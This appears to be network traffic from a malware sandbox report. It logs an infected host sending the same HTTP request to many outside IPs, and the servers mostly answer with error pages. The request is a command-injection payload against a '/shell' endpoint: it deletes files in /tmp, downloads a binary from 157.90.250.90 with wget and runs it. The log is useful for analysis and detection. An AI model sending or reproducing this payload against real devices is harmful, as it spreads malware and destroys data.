                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 70 65 65 64 74 65 73 74 2d 62 65 6b 61 73 69 2e 67 6d 64 70 2e 6e 65 74 2e 69 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.25 (Debian) Server at speedtest-bekasi.gmdp.net.id Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          532192.168.2.235857213.250.65.9280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:21.541316986 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:21.887864113 CET433INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:21 GMT
                                                          Server: Apache
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          533192.168.2.235549269.192.43.5880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:21.993011951 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:22.144402027 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:25:22 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:22 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 65 61 34 32 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 31 32 32 26 23 34 36 3b 64 38 62 31 34 37 63 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;8ea4217&#46;1704173122&#46;d8b147c0</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          534192.168.2.233548054.87.227.16480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:22.000530005 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:22.159405947 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.22.1
                                                          Date: Tue, 02 Jan 2024 05:25:22 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          535192.168.2.2347390216.137.174.13480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:22.016894102 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:22.192600012 CET427INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 11:24:45 GMT
                                                          Server: Apache
                                                          X-Frame-Options: DENY
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          536192.168.2.234650023.3.57.12480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:22.066559076 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:22.291474104 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:22 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:22 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 36 36 37 34 32 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 31 32 32 26 23 34 36 3b 38 64 61 63 37 35 63 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;46674217&#46;1704173122&#46;8dac75cd</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          537192.168.2.2360650104.97.11.2480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:22.089353085 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:22.336949110 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:25:22 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:22 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 35 61 63 31 37 30 32 26 23 34 36 3b 31 37 30 34 31 37 33 31 32 32 26 23 34 36 3b 66 31 32 35 62 34 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;35ac1702&#46;1704173122&#46;f125b47</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          538192.168.2.2345270121.143.178.8280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:22.173558950 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:23.716979980 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:25.540738106 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:29.220201015 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:36.643143892 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          539192.168.2.2345268121.143.178.8280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:22.174762011 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:23.716989994 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:25.540713072 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:29.220216036 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:36.643142939 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          540192.168.2.2348672114.55.243.17680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:22.179481030 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:23.748966932 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:24.052572012 CET421INHTTP/1.1 401 Unauthorized
                                                          Server: nginx/1.12.2
                                                          Date: Tue, 02 Jan 2024 05:25:23 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 195
                                                          Connection: keep-alive
                                                          WWW-Authenticate: Basic realm="Apache Flink Dashboard"
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          541192.168.2.2351812103.21.117.2280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:22.210601091 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:23.940917015 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:26.148611069 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.244026899 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:38.434876919 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          542192.168.2.2360248107.158.48.17380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:24.657250881 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:24.778176069 CET322INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:09 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          543192.168.2.235082637.221.198.8680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:24.777893066 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:25.026772022 CET354INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.0 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:25:24 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 178
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          544192.168.2.2347672104.114.164.4980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.169173956 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:25.312587976 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:25:25 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:25 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 35 62 63 37 37 36 38 26 23 34 36 3b 31 37 30 34 31 37 33 31 32 35 26 23 34 36 3b 62 34 35 65 66 35 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;65bc7768&#46;1704173125&#46;b45ef54</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          545192.168.2.2335322173.242.127.8180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.176698923 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:25.328879118 CET1286INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.20.1
                                                          Date: Tue, 02 Jan 2024 05:25:25 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 3650
                                                          Connection: keep-alive
                                                          ETag: "636d2d22-e42"
